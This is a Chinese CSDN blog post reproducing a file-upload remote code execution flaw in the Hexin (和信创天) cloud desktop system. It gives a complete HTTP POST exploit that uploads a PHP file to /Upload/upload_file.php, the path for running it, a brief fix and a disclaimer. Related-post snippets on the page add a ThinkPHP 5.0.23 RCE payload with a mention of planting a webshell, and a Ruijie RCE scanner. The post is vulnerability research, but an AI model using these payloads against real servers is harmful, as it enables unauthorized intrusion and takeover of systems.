和信创天云桌面系统远程命令执行 RCE漏洞复现渗透测试

最新推荐文章于 2024-05-11 10:36:35 发布
最新推荐文章于 2024-05-11 10:36:35 发布
阅读量934 收藏
点赞数
分类专栏: 渗透测试 文章标签: 渗透测试 数据安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kelenwait/article/details/118771228
版权

前言

和信创天云桌面系统,官方介绍,市场上主要有华为、深信服、锐捷、和信创天四大云桌面厂商,华为从网络设备的角度打造整体解决方案,深信服从安全的角度切入云桌面,锐捷主打针对教育行业的云课堂业务,但前三家厂商的云桌面产品多以传统VDI架构为主,和信创天的下一代云桌面能够融合VDI、VOI和IDV三大架构。

漏洞影响:和信创天云桌面系统

漏洞复现

poc

POST /Upload/upload_file.php?l=1 HTTP/1.1
Host: 127.0.0.1:2001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
Referer: http://127.0.0.1:2001/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8
Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
Content-Length: 182

------WebKitFormBoundaryfcKRltGv
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/avif

<?php phpinfo(); ?>
------WebKitFormBoundaryfcKRltGv--

可以直接使用HackBar进行重放

然后访问路径 ````/Upload/“. l . ” / “ . l.”/“. l./._FILES[“file”][“name”]```

本例则为 /Upload/1/test.php

修复建议

修改upload_file.php 限制文件上传类型

注意:本文仅供学习参考,非法传播及使用产生的后果自行承担,与本文作者无关

欢迎讨论,持续更新中,感谢关注!

烽铃子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
信创云桌面系统VENGD文件上传漏洞复现
afei001
04-25 453
目录 1.漏洞概述 2.漏洞分析 3.影响版本 4.漏洞等级 5.漏洞复现 5.1 FOFA实战复现 5.2 VESystem_VENGD_fileUpload_POC.py 5.3 VESystem_VENGD_fileUpload_EXP.py 5.漏洞修复 声明:以下脚本具有攻击性,请勿非法使用,否则后果自负。请勿进行非授权测试,否则后果自负。 1.漏洞概述 和信创下一代云桌面系统融合了VDI、VOI、IDV三大架构优势的云桌面产品,实现了前后端混合...
漏洞复现|和信创云桌面系统存在任意文件上传&目录遍历漏洞
失心少年
06-27 345
信创专注虚拟化云计算领域,为首家集VOI/VDI/IDV于一体的云桌面厂家,助力教育、医疗、政企、军工、电力、金融等行业客户实现千台终端统一管理,确保数据安全与业务连续性。和信下一代云桌面基于VDI/VOI/IDV三种技术架构优势,对于用户应用场景有着普遍的适用性,前后端混合计算保证在调度服务器后端资源的同时,也能充分利用前端计算资源,高性能的电脑和低功耗的瘦终端均能流畅地运行各种操作系统与应用软件,能够轻松实现千点以上大规模终端的集中管理。
信创云桌面系统远程命令执行
自强不息
05-31 236
下不定,吾往;​若世道不平,不回!
锐捷EWEB网管系统RCE漏洞
最新发布
一个努力学习网安的小牛马
05-11 639
锐捷网管系统是由北京锐捷数据时代科技有限公司开发的新一代基于云的网络管理软件,以"数据时代创新网管与信息安全"为口号,定位于终端安全、IT运营及企业服务化管理统一解决方案。使用cookie向/flow_control_pi/flwo.control.php?用post请求访问/ddi/server/login.php页面并提交admin参数可以获得管理员的cookie。在该系统的/flow_control_pi/flwo.control.php的文件中存在命令执行参数。
信创云桌面系统_命令执行_任意文件上传
MD@@nr丫卡uer
04-12 884
fofa title=“和信下一代云桌面VENGD” 漏洞复现 POST /Upload/upload_file.php?l=test HTTP/1.1 Host: X.X.X.X Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv ------WebKitFormBoundaryfcKRltGv Content-Disposition: form-data; name="file"; filename="1
漏洞复现】和信创云桌面系统—任意文件上传
Kris__zhang的博客
05-13 1685
简介 和信下一代云桌面,是一款基于NGD(Next Generation Desktop)架构的桌面虚拟化产品,融合帧传输(VDI)和流传输(VOI/IDV),构建既可以利用服务器的计算资源进行集中计算,又可以利用终端本身的资源进行分布计算的“前后端混合计算”模式,从而有效解决客户终端在集中管理、高效运维和安全可用等难题。 漏洞信创云桌面系统存在命令执行_任意文件上传,可上传恶意文件获取服务器权限 FOFA语句 title="和信下一代云桌面VENGD" 复现 payload: POST /Upl
fengjixuchui#Vulnerability-1#和信创云桌面系统命令执行,文件上传 全版本 RCE1
07-25
信创云桌面系统命令执行,文件上传 全版本 RCE参考:。
锐捷EG易网关login.php以及其后台cli.php/branch_passw.php RCE漏洞复现 [附POC]
薛定谔嘚喵博客
11-16 982
锐捷网络是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。锐捷EG易网关系统存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷。
RuijieRCE:锐捷锐捷网络RCE突破检测工具,可批量检测
03-06
自述文件 瑞杰网络RCE漏洞检测工具,为方便渗透测试使用,可以批量检测,也会生成历史记录。同时也为防止他人恶意使用,可自定义GET参数密码,该密码由sha256加密,难以破解。 免责声明 由于传播,利用此文所提供的信息而造成的任何直接或间接的后果及损失,均由使用者本人负责,作者不承担任何责任。 参数 -f string 导入.txt文件批量扫描 -n string 自定义POST木马密码,默认cmd -p string 自定义GET密码验证,默认为cmd -u string 目标URL 使用 检测到防御后生成随机数.php文件执行命令,也可以上菜刀。 普通使用 GET密码:cmd POST密码:cmd ./RuijieRCE -u http://127.0.0.1:4430 设置密码 -n参数为POST密码,-p参数为GET密码这两
2018最值得期待:虚拟化云桌面领导品牌和信创
02-28 2631
是正月十三,祝大家万事大吉!今年春节不一样,中国云报携手虚拟化云桌面领导品牌和信创给您拜年!以下是和信创董事长何钦淋的新春寄语值此新春和元宵佳节到来之际,我谨代表和信创全体同仁向中国云报的粉丝朋友致以新年的问候,祝大家2018年万事大吉,人旺、财旺、事业旺!和信创成立于2009年,公司致力于为用户提供国际领先的虚拟化和云计算解决方案;拥有下一代云桌面、云存储、应用虚拟化、云计算管理平台
信创下一代云桌面的三个“万万没想到”
04-25 1726
知名女演员李冰冰在第一次荣膺华表奖优秀女主角奖时,发表了一段感人至深的致辞:“刚才我从台下走到台上用了不到一分钟,但实际上我走了十年,终于拿到了这个奖项。”十年磨一剑,不...
内网渗透测试:初探远程桌面的安全问题
m0_59598029的博客
08-21 475
远程桌面对了解内网渗透的人来说可能再熟悉不过了。在渗透测试中,拿下一台主机后有时候会选择开 3389进远程桌面查看一下对方主机内有无一些有价值的东西可以利用。但是远程桌面的利用不仅如此,本节我们便来初步汇总一下远程桌面在内网渗透中的各种利用姿势。文中若有不当之处还请各位大佬多多点评。
锐捷RG-UAC应用网关nmc_sync.php 接口前台RCE(含批量验证poc)
weixin_43567873的博客
04-04 62
锐捷RG-UAC应用网关nmc_sync.php 接口前台RCE(含批量验证poc)
CNVD-2021-09650:锐捷NBR路由器(guestIsUp.php)RCE漏洞复现 [附POC]
薛定谔嘚喵博客
11-15 1044
锐捷网络是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。锐捷NBR 路由器系统存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷。
几个大厂及 RCE漏洞二三事
smellycat000的专栏
12-04 359
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队这两有几个比较重要的漏洞和资讯,统一概括一下:(1)微软修复可接管 Azure 账户的漏洞微软最近修复了一个 OAuth ...
thinkphp5.0.23rce漏洞复现
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行RCE)的漏洞漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞利用过程如下: 1. 访问靶机地址和端口号,进入首页。 2. 使用Burp抓包工具修改传参方式为POST,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd是系统执行命令的参数。 3. 接着进行漏洞复现过程,首先在Kali docker容器中启动此漏洞环境。 4. 使用浏览器访问Kali的IP地址接上8080端口。 5. 再次使用Burp抓包工具,修改传参方式为POST,URL后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。 6. 点击Burp中的Go按钮,尝试写入phpinfo。 7. 成功后,写入一句话木马,密码为aaa。 8. 进一步操作,可以上蚁剑。 漏洞复现成功后,您可以参考这篇文章了解更多细节:[https://www.cnblogs.com/zenb/p/14537240.html](https://www.cnblogs.com/zenb/p/14537240.html)。如果您对此漏洞有更多疑问,欢迎提出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值